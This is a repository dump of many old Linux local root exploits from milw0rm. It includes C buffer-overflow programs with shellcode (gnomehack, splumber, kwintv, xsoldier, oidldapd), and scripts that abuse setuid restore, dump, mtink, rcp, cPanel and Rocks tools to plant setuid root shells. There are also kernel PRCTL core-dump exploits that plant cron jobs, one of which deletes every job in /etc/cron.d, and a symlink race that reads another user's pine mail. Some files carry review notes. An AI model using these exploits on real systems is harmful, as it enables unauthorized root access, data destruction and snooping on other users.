can also be applied to nethack) 4 | 5 | syntax: ./deb_gnomehack [offset] [alignment]. 6 | 7 | example: 8 | ------------------------------------------------- 9 | # ./deb_gnomehack 500 0 10 | [ (linux/debian)gnomehack[v1.0.5] buffer overflow, by: v9[v9@fakehalo.org]. ] 11 | [ return address: 0xbffff978, offset: 500, align: 0. ] 12 | sh-2.03$ id 13 | uid=1001(v9) gid=1001(v9) egid=60(games) groups=1001(v9) 14 | sh-2.03$ 15 | ------------------------------------------------- 16 | 17 | note: overflow exists in $NETHACKOPTIONS as well, like nethack. 18 | */ 19 | #define PATH "/usr/lib/games/gnomehack/gnomehack" // path to gnomehack. 20 | #define DEFAULT_OFFSET 500 // default offset. 21 | #define DEFAULT_ALIGN 0 // default alignment. 
22 | static char exec[]= 23 | "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56" 24 | "\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80" 25 | "\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; 26 | long esp(void){__asm__("movl %esp,%eax");} 27 | int main(int argc,char **argv){ 28 | char bof[300]; 29 | int i,offset,align; 30 | long ret; 31 | printf("[ (linux/debian)gnomehack[v1.0.5] buffer overflow, by: v9[v9@fakehalo." 32 | "org]. ]\n"); 33 | if(argc>1){offset=atoi(argv[1]);} 34 | else{offset=DEFAULT_OFFSET;} 35 | if(argc>2){ 36 | if(atoi(argv[2])>3||atoi(argv[2])<0){ 37 | printf("*** ignored argument alignment value: %s. (use 0-3)\n",argv[2]); 38 | align=DEFAULT_ALIGN; 39 | } 40 | else{align=atoi(argv[2]);} 41 | } 42 | else{align=DEFAULT_ALIGN;} 43 | ret=(esp()-offset); 44 | printf("[ return address: 0x%lx, offset: %d, align: %d. ]\n",ret,offset,align); 45 | for(i=align;i<300;i+=4){*(long *)&bof[i]=ret;} 46 | for(i=0;i<(250-strlen(exec));i++){*(bof+i)=0x90;} 47 | memcpy(bof+i,exec,strlen(exec)); 48 | setenv("HOME",bof,1); 49 | if(execlp(PATH,"gnomehack",0)){ 50 | printf("*** execution of %s failed. (check the path)\n",PATH); 51 | exit(-1); 52 | } 53 | } 54 | 55 | // milw0rm.com [2000-11-15] 56 | -------------------------------------------------------------------------------- /linux/linux_exploits/182.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # /sbin/restore exploit for rh6.2 4 | # 5 | # I did not find this weakness my self, all i did was 6 | # writing this script (and some more) to make it 7 | # automatic and easy to use. 8 | # 9 | # This exploit should work on all redhat 6.2 systems 10 | # with /sbin/restore not "fucked up". May work on other 11 | # distros too, but only tested successfully on rh6.2. 12 | # 13 | # Make sure that the $USER variable is set! If you aren't 14 | # sure, do a SET USER= before you start 15 | # the exploit! 
16 | # 17 | # Please do NOT remove this header from the file. 18 | # 19 | 20 | echo "###########################################" 21 | echo "# /sbin/restore exploit for rh6.2 #" 22 | echo "# this file by nawok '00 #" 23 | echo "###########################################" 24 | echo " " 25 | echo "==> EXPLOIT STARTED, Wait..." 26 | echo "#!/bin/sh" >> /home/$USER/execfile 27 | echo "cp /bin/sh /home/$USER/sh" >> /home/$USER/execfile 28 | echo "chmod 4755 /home/$USER/sh" >> /home/$USER/execfile 29 | chmod 755 /home/$USER/execfile 30 | export TAPE=restorer:restorer 31 | export RSH=/home/$USER/execfile 32 | touch /tmp/1 33 | /sbin/restore -t /tmp/1 34 | rm -f /home/$USER/execfile 35 | echo "==> DONE! If everything went OK we will now enter rootshell..." 36 | echo "==> To check if its rooted, type 'whoami', or 'id'" 37 | echo "==> B-Bye, you are on your own now." 38 | /home/$USER/sh 39 | 40 | 41 | # milw0rm.com [2000-11-16] 42 | -------------------------------------------------------------------------------- /linux/linux_exploits/183.c: -------------------------------------------------------------------------------- 1 | /* 2 | Exploit Code for oidldapd in Oracle 8.1.6 (8ir2) for Linux. 3 | I tested in RH 6.2 and 6.1. This code is a bullshit (i know 4 | please no comments about ;-)). 5 | 6 | If someone exports this to Sparc please tell me. 7 | 8 | synopsis: buffer overflow in oidldapd 9 | impact: any user gain euid=oracle. 10 | 11 | Dedicated to PlazaSite guys. Klink Klink Team. Panxeta, Entrophy and others. 
12 | */ 13 | 14 | #include 15 | #include 16 | 17 | #define DEFAULT_OFFSET 13 18 | #define DEFAULT_BUFFER_SIZE 700 19 | #define NOP 0x90 20 | #define ORACLE_HOME "/usr/local/oracle/app/oracle/product/8.1.6" 21 | 22 | char shellcode[] = 23 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 24 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 25 | "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 26 | 27 | unsigned long get_sp(void) { 28 | __asm__("movl %esp,%eax"); 29 | } 30 | 31 | void main(int argc, char *argv[]) { 32 | char *buff, *ptr,*name[3],environ[100],binary[120]; 33 | long *addr_ptr, addr; 34 | int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; 35 | int i; 36 | 37 | buff = malloc(bsize); 38 | addr = get_sp() - offset; 39 | ptr = buff; 40 | addr_ptr = (long *) ptr; 41 | for (i = 0; i < bsize; i+=4) 42 | *(addr_ptr++) = addr; 43 | 44 | for (i = 0; i < bsize/2; i++) 45 | buff[i] = NOP; 46 | 47 | ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); 48 | for (i = 0; i < strlen(shellcode); i++) 49 | *(ptr++) = shellcode[i]; 50 | 51 | buff[bsize - 1] = '\0'; 52 | 53 | memcpy(buff,"EGG=",4); 54 | putenv(buff); 55 | sprintf(environ,"ORACLE_HOME=%s",ORACLE_HOME); 56 | putenv(environ); 57 | sprintf(binary,"%s/bin/oidldapd connect=$EGG",ORACLE_HOME); 58 | system(binary); 59 | } 60 | 61 | 62 | // milw0rm.com [2000-11-16] 63 | -------------------------------------------------------------------------------- /linux/linux_exploits/1831.txt: -------------------------------------------------------------------------------- 1 | # tiffsplit (libtiff <= 3.8.2) local stack buffer overflow PoC 2 | 3 | tiffsplit from libtiff (http://www.remotesensing.org/libtiff/) 4 | is vulnerable to a bss-based and stack-based overflow, but, I just 5 | wrote the concept c0de for stack-based b0f 'cause I don't know how 6 | to take advantage of the overwritten bss data (after the overflow, 7 | that data is overwritten again correctly by a program' function). 
8 | 9 | .bss section is in higher addresses than .dtors section, so, we 10 | can't hijack .dtors to.... 11 | 12 | PoC: http://www.exploit-db.com/sploits/05262006-tiffspl33t.tar.gz 13 | 14 | nitr0us 15 | 16 | # milw0rm.com [2006-05-26] 17 | -------------------------------------------------------------------------------- /linux/linux_exploits/186.pl: -------------------------------------------------------------------------------- 1 | /* 2 | (linux)splumber[version2] buffer overflow, by v9[v9@fakehalo.org]. this is 3 | a misc. exploit for the linux-SVGAlib space plumber game. which, as you 4 | know needs to be installed setuid root. this overflow is due to a simple 5 | oversight in the command line parser. uses strcpy() to copy to an unchecked 6 | 250 byte buffer. 7 | 8 | note: i also noticed, other than just being setuid root in the makefile, it 9 | sets splumber's permissions to 4777. *g* 10 | 11 | ...and here is the perl script for the lazy person: 12 | 13 | #!/usr/bin/perl 14 | $i=$ARGV[0]; 15 | while(1){ 16 | print "using offset: $i.\n"; 17 | system("./xsplumber $i"); 18 | $i+=50; 19 | } 20 | */ 21 | 22 | #define PATH "/usr/games/splumber" // change to the correct path. 23 | #define BUFFER_SIZE 257 // don't change. 24 | #define DEFAULT_OFFSET -300 // worked for me. 25 | 26 | static char exec[]= 27 | "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56" 28 | "\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80" 29 | "\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; // still like it. 
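
long esp(void){__asm__("movl %esp,%eax");} /* stack pointer via %eax; i386 only */
/* Builds a 256-byte argv[1] -- NOP sled, shellcode, then the guessed
   return address -- and execs splumber with it.  argv[1] of this program
   is an optional offset subtracted from the current stack pointer;
   DEFAULT_OFFSET is negative, so by default the guess points above the
   current stack. */
int main(int argc,char **argv){
 char bof[BUFFER_SIZE];
 int i,offset;
 long ret;
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 ret=(esp()-offset);
 printf("*** (linux)splumber[version2] local buffer overflow, by v9[v9@fakehalo.org].\n");
 printf("*** return address: 0x%lx, offset: %d.\n",ret,offset);
 /* bytes 0..251: NOPs, then the shellcode ending exactly at byte 251 */
 for(i=0;i<(252-strlen(exec));i++){*(bof+i)=0x90;}
 memcpy(bof+i,exec,strlen(exec));
 /* bytes 252..255: return address, right after the shellcode */
 *(long *)&bof[i+strlen(exec)]=ret; // perfect, not lazy for once.
 bof[BUFFER_SIZE-1]=0;
 /* execlp only returns on failure; the trailing 0 terminates argv */
 if(execlp(PATH,"splumber",bof,0)){
 printf("error: program did not execute properly, check the path.\n");
 exit(0);
 }
}


# milw0rm.com [2000-11-17]
--------------------------------------------------------------------------------
/linux/linux_exploits/193.sh:
--------------------------------------------------------------------------------
#!/bin/sh

# Redhat 6.2 dump command executes external program
# with suid priviledge.
# Discovered by Mat
# Written for and by a scriptkid Tasc ;P
# Remember, there's no cure for BSE
#
# How it works (as the script shows it): with TAPE set to a host:file
# spec, the set-uid dump appears to run the program named by $RSH with
# its privileges; /tmp/rsh then copies /bin/sh and makes the copy
# set-uid root.
#
# Review notes:
#  - Fixed: the generated /tmp/rsh used to end with a stray "}" line,
#    which made the helper exit with a shell syntax error after the
#    copy and chmod had already run.
#  - /tmp/rsh and /tmp/sush are fixed, predictable names in a shared
#    directory; another local user can pre-create them (symlink race).
#  - /tmp/sush is a world-executable set-uid root shell left on disk;
#    remove it when done.

echo "dump-0.4b15 root exploit"
echo "Discovered by Mat "
echo "-------------------------------------"
echo
DUMP=/sbin/dump
if [ ! -u $DUMP ]; then
echo "$DUMP is NOT setuid on this system or does not exist at all!"
echo
exit 0
fi
export TAPE=iamlame:iamlame
export RSH=/tmp/rsh
cat >/tmp/rsh <<__eof__
#!/bin/sh
cp /bin/sh /tmp/sush
chmod 4755 /tmp/sush
__eof__
chmod 755 /tmp/rsh
/sbin/dump -0 /
echo
echo "Waiting for rootshell .... 5 seconds...." 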
sleep 5
/tmp/sush
id


# milw0rm.com [2000-11-19]
--------------------------------------------------------------------------------
/linux/linux_exploits/2004.c:
--------------------------------------------------------------------------------
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
/*
 * How it works: a child chdir()s into /etc/cron.d, marks itself dumpable
 * with prctl(PR_SET_DUMPABLE, 2) and is then sent SIGSEGV, so its core
 * file lands in /etc/cron.d.  The payload string only has to be present
 * in the child's memory: cron evidently tolerates the unparseable lines
 * of the dump and acts on the embedded "* * * * * root ..." entry, which
 * installs a set-uid root copy of /bin/sh at /tmp/sh and deletes the core.
 *
 * Review notes:
 *  - The header names of the eight #include lines were stripped when this
 *    listing was rendered; they are left as found.
 *  - There is no synchronisation between fork() and kill(): the parent
 *    signals the child immediately, so on a busy box the child may not
 *    have reached chdir()/prctl() yet and the dump lands elsewhere (or
 *    nowhere).  Rerun if /tmp/sh never appears.
 *  - /tmp/sh is a world-executable set-uid root shell; any local user can
 *    use it until it is removed (the closing message says so too).
 */

#include
#include
#include
#include
#include
#include
#include
#include

/* Crontab fragment kept in the process image; the leading newline is
   presumably there so the entry starts on a fresh line inside the dump. */
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() {
 int child;
 struct rlimit corelimit;
 printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
 printf("By: dreyer & RoMaNSoFt\n");
 printf("[ 10.Jul.2006 ]\n\n");

 /* Unlimited core size; rlimits are inherited by the forked child. */
 corelimit.rlim_cur = RLIM_INFINITY;
 corelimit.rlim_max = RLIM_INFINITY;
 setrlimit(RLIMIT_CORE, &corelimit);

 printf("[*] Creating Cron entry\n");

 if ( !( child = fork() )) {
 /* Child: move into cron's directory, become dumpable, wait to be killed. */
 chdir("/etc/cron.d");
 prctl(PR_SET_DUMPABLE, 2);
 sleep(200);
 exit(1);
 }

 kill(child, SIGSEGV);

 /* The wait gives cron time to notice the new file and run the entry. */
 printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
 sleep(62);

 printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
 system("/tmp/sh -i");
}

// milw0rm.com [2006-07-11]
--------------------------------------------------------------------------------
/linux/linux_exploits/2009-therebel.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/2009-therebel.tgz
--------------------------------------------------------------------------------
/linux/linux_exploits/2009-wunderbar_emporium.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/2009-wunderbar_emporium.tgz
--------------------------------------------------------------------------------
/linux/linux_exploits/2011.sh:
--------------------------------------------------------------------------------
#!/bin/sh
#
# PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
# tested on Intel(R) Xeon(TM) CPU 3.20GHz
# kernel 2.6.9-22.ELsmp
# maybe others ...
# Tx to drayer & RoMaNSoFt for their clear code...
#
# zmia23@yahoo.com
#
# Same technique as 2004.c (core dump of a dumpable child written into
# /etc/cron.d, crontab line carried in the child's memory), packaged as
# a script that writes and compiles two helpers in /tmp.
#
# Review notes -- read before running on anything you care about:
#  - The cron payload runs "chmod 4777 /tmp/s": a set-uid root binary that
#    is also world-WRITABLE.  Until /tmp/s is gone, any local user can
#    overwrite it and run their own code as root.
#  - /tmp/s itself runs "rm -rf /etc/cron.d/*" on exit, which deletes
#    every job in /etc/cron.d, not just the dumped core file.  That is
#    destructive and not reversible without backups.
#  - /tmp/getsuid.c, /tmp/s.c and /tmp/s are fixed names in a shared
#    directory (symlink race with other local users).
#  - The #include lines inside the here-documents lost their header names
#    when this listing was rendered; they are left as found.
#  - The final "rm -rf prctl.sh" assumes this script was saved as
#    prctl.sh in /tmp.


cat > /tmp/getsuid.c << __EOF__
#include
#include
#include
#include
#include
#include
#include
#include

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";

int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include
main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh

# milw0rm.com [2006-07-14]
--------------------------------------------------------------------------------
/linux/linux_exploits/2015.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
##############################################################################
## rocksumountdirty.py: Rocks release <=4.1 local root exploit
## quick and nasty version of the exploit. make sure the . is writable and
## you clean up afterwards. 
;) 6 | ## 7 | ## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] 8 | ############################################################################## 9 | x=__import__('os');c=x.getcwd() 10 | open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c)) 11 | print "Rocks Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]" 12 | x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c) 13 | 14 | # milw0rm.com [2006-07-15] 15 | -------------------------------------------------------------------------------- /linux/linux_exploits/2016.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ############################################################################## 3 | ## rocksmountdirty.sh: Rocks release <=4.1 local root exploit 4 | ## make sure 'mount-loop' is in your path for this to work. 5 | ## 6 | ## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] 7 | ############################################################################## 8 | echo "Rocks Clusters <=4.1 mount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]" 9 | echo "getting root.. 
goodluck" 10 | mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'" 11 | 12 | # milw0rm.com [2006-07-15] 13 | -------------------------------------------------------------------------------- /linux/linux_exploits/205.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # 3 | # exploits suid privledges on rcp 4 | # Not really tested this but hey 5 | # works on redhat6.2 6 | # not werk on freebsd4.1 stable 7 | # 8 | # bug discovered by 9 | # Andrew Griffiths 10 | # 11 | # Exploit written by tlabs 12 | # greetz to those that know me innit 13 | # 14 | # Please set your rcpfile 15 | # this can be found by doing 16 | # 17 | # ls -alF `which rcp` 18 | # 19 | # have a lot of fun 20 | 21 | $RCPFILE="/usr/bin/rcp" ; 22 | 23 | # configure above innit 24 | 25 | sub USAGE 26 | { 27 | print "$0\nWritten by Tlabs\n" ; 28 | exit 0 ; 29 | } 30 | 31 | if ( ! -u "$RCPFILE" ) 32 | { 33 | printf "rcp is not suid, quiting\n" ; 34 | exit 0; 35 | } 36 | 37 | open(TEMP, ">>/tmp/shell.c")|| die "Something went wrong: $!" 
; 38 | printf TEMP "#include\n#include\nint main()\n{" ; 39 | printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}\n" ; 40 | close(TEMP); 41 | open(HMM, ">hey")|| die "Something went wrong: $!"; 42 | print HMM "Sploit written by tlabs, thanks to Andrew Griffiths for the bug report" ; 43 | close(HMM); 44 | 45 | system "rcp 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null" ; 46 | system "rcp 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null" ; 47 | unlink("/tmp/shell.c"); 48 | unlink("hey"); 49 | unlink("geezer"); 50 | printf "Ok, too easy, we'll just launch a shell, lets hope shit went well, innit:)\n" ; 51 | 52 | exec '/tmp/shell' ; 53 | 54 | 55 | # milw0rm.com [2000-11-29] 56 | -------------------------------------------------------------------------------- /linux/linux_exploits/2144.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "mtink libXm local root exploit" 4 | echo "* karol@wiesek.pl *" 5 | echo 6 | umask 000 7 | export DEBUG_FILE="/etc/ld.so.preload" 8 | cat > /tmp/lib.c << _EOF 9 | #include 10 | void _init(void) 11 | { 12 | if (getuid()!=0 && geteuid()==0) 13 | { 14 | setuid(0); 15 | unlink("/etc/ld.so.preload"); 16 | execl("/bin/bash", "bash", 0); 17 | } 18 | } 19 | _EOF 20 | /usr/bin/gcc -o /tmp/lib.o -c /tmp/lib.c 21 | /usr/bin/ld -shared -o /tmp/lib.so /tmp/lib.o 22 | /usr/bin/mtink 23 | echo "/tmp/lib.so" > /etc/ld.so.preload 24 | /bin/ping 25 | 26 | # milw0rm.com [2006-08-08] 27 | -------------------------------------------------------------------------------- /linux/linux_exploits/221.c: -------------------------------------------------------------------------------- 1 | /* 2 | * (kwintv) local buffer overflow. (gid=video(33)) 3 | * 4 | * Author: Cody Tubbs (loophole of hhp). 5 | * www.hhp-programming.net / pigspigs@yahoo.com 6 | * 12/17/2000 7 | * 8 | * For SuSE 7.0 - x86. 9 | * sgid "video"(33) by default. 
10 | * 11 | * bash-2.04$ id 12 | * uid=1000(loophole) gid=501(noc) 13 | * bash-2.04$ ./b 0 14 | * Ret-addr 0xbfffe1fc, offset: 0, allign: 0. 15 | * sh-2.04$ id 16 | * uid=1000(loophole) gid=33(video) 17 | * sh-2.04$ 18 | * 19 | */ 20 | 21 | #include 22 | 23 | #define OFFSET 0 24 | #define ALLIGN 0 25 | #define NOP 0x90 26 | #define DBUF 481 //481+((RET)). 27 | #define GID 33 28 | 29 | static char shellcode[]= 30 | "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0" 31 | "\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31" 32 | "\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0" 33 | "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08" 34 | "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8" 35 | "\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x69"; 36 | 37 | long get_sp(void){ 38 | __asm__("movl %esp,%eax"); 39 | } 40 | 41 | void workit(char *heh){ 42 | fprintf(stderr, "\n(kwintv) local exploit for SuSE 7.0 - x86\n"); 43 | fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)\n\n"); 44 | fprintf(stderr, "Usage: %s [allign(0..3)]\n", heh); 45 | fprintf(stderr, "Examp: %s 0\n", heh); 46 | fprintf(stderr, "Examp: %s 0 1\n", heh); 47 | exit(1); 48 | } 49 | 50 | 51 | main(int argc, char **argv){ 52 | char eipeip[DBUF], buffer[4096], heh[DBUF+1]; 53 | int i, offset, gid, allign; 54 | long address; 55 | 56 | if(argc<2){ 57 | workit(argv[0]); 58 | } 59 | 60 | if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;} 61 | if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;} 62 | 63 | address=get_sp()-offset; 64 | 65 | if(allign>0){for(i=0;i 16 | #define DBUF 287 // 56(fun)+RET+227! 17 | #define OFFSET 0 // Change if fails. 
18 | 19 | static char shellcode[]= 20 | "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" 21 | "\x66\x31\xc0\x66\x31\xdb\xb0\x2e\xcd\x80" 22 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46" 23 | "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" 24 | "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff" 25 | "/bin/sh\x69"; 26 | 27 | long get_sp(void){__asm__("movl %esp,%eax");} 28 | main(int argc, char **argv){ 29 | char eipeip[DBUF]=" Don't forget to check www.hhp-programming.net"; 30 | char buffer[4096], heh[256+1]; // ^ :D 31 | int i, offset; 32 | long address; 33 | if(argc>1){offset=atoi(argv[1]);} 34 | else{offset=OFFSET;} 35 | address=get_sp()-offset; 36 | for(i=56;i 2 | #include 3 | 4 | #define NOP 0x90 5 | #define BUFSIZE 4408 6 | #define OFFSET 0 7 | #define RANGE 20 8 | 9 | unsigned char blah[] = 10 | "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" 11 | "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" 12 | "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" 13 | "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" 14 | "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" 15 | "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" 16 | "\xc2\x91"; 17 | 18 | long get_sp () { __asm__ ("mov %esp, %eax"); } 19 | 20 | int 21 | main (int argc, char *argv[]) 22 | { 23 | char buffer[BUFSIZE]; 24 | int i, offset; 25 | unsigned long ret; 26 | 27 | if (argc > 1) 28 | offset = atoi(argv[1]); 29 | else 30 | offset = OFFSET; 31 | 32 | for (i = 0; i < (BUFSIZE - strlen (blah) - RANGE*2); i++) 33 | *(buffer + i) = NOP; 34 | 35 | memcpy (buffer + i, blah, strlen (blah)); 36 | 37 | ret = get_sp(); 38 | for (i = i + strlen (blah); i < BUFSIZE; i += 4) 39 | *(long *) &buffer[i] = ret+offset; 40 | 41 | fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\n"); 42 | fprintf(stderr, 
"zorgon@antionline.org\n"); 43 | fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE); 44 | execl ("./xsoldier", "xsoldier", "-display", buffer, 0); 45 | } 46 | 47 | 48 | // milw0rm.com [2000-12-15] 49 | -------------------------------------------------------------------------------- /linux/linux_exploits/231.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Grab local pine messages 3 | # Usage: ./mon_pine.sh 4 | # victim pine must use following settings 5 | # 6 | # mat@hacksware.com 7 | # http://hacksware.com 8 | # 9 | # [x] enable-alternate-editor-cmd 10 | # [x] enable-alternate-editor-implicitly 11 | # editor = /usr/bin/vi 12 | # 13 | 14 | PID=$1 15 | PICO_FILE=`printf "/tmp/pico.%.6d" $PID` 16 | TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"` 17 | echo PICO_FILE is $PICO_FILE 18 | 19 | #if $PICO_FILE and $TRASHCAN exists, remove them 20 | if test -f $PICO_FILE 21 | then 22 | rm -f $PICO_FILE 23 | fi 24 | if test -f $TRASHCAN 25 | then 26 | rm -f $TRASHCAN 27 | fi 28 | 29 | ln -s $TRASHCAN $PICO_FILE 30 | while : 31 | do 32 | if test -f $TRASHCAN 33 | then 34 | break 35 | fi 36 | done 37 | 38 | echo Victim is Editing Pine Message 39 | rm -f $PICO_FILE 40 | echo We replace temporary file 41 | touch $PICO_FILE 42 | chmod 777 $PICO_FILE 43 | echo "Get the message from "$PICO_FILE 44 | echo "^C to break tailer" 45 | tail -f $PICO_FILE 46 | 47 | 48 | # milw0rm.com [2000-12-15] 49 | -------------------------------------------------------------------------------- /linux/linux_exploits/2466.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | # 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin 4 | # use strict; # haha oh wait.. 

# NOTE(review): mechanism as visible here -- PERL5LIB is pointed at the
# current directory and a fake strict.pm is written there, so when the
# setuid mysqlwrap (presumably a Perl script run through cpwrap) does
# `use strict` it compiles and runs the attacker's module as root.  That
# module compiles a setreuid(0,0)/setregid(0,0) shell called Maildir in the
# cwd and chmods it 4755.  Before running: `Maildir` is never removed, so
# an interrupted run leaves a root setuid binary lying in the cwd, and the
# "patched" check is just a grep of the cpwrap binary for REMOTE_USER.
my $cpwrap = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap";
my $pwd = `pwd`;

chomp $pwd;
$ENV{'PERL5LIB'} = "$pwd";

# `$!` carries no meaningful errno after a failed -x test; messages are cosmetic.
if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; }
if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; }
if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; }

open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
# The readline operand was lost when this listing was rendered (presumably <CPWRAP>).
while() {
if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
}
close (CPWRAP);

# Fake strict.pm: the nested escaping produces a one-line C program, which is
# echoed into Maildir.c, compiled, made setuid, and the sources removed.
open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print STRICT "system(\"/bin/chmod 4755 Maildir\");\n";
print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);

system("$mysqlwrap DUMPMYSQL 2>/dev/null");

if ( -e "Maildir" ) {
system("./Maildir");
}
else {
unlink "strict.pm";
die "Failed\n";
}

# milw0rm.com [2006-10-01]
--------------------------------------------------------------------------------
/linux/linux_exploits/252.pl:
--------------------------------------------------------------------------------
#!/usr/bin/perl

## (c) Copyright teleh0r@doglover.com / anno domani 2000
##
## Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux
## Tested on: RedHat 4.0/5.1
##
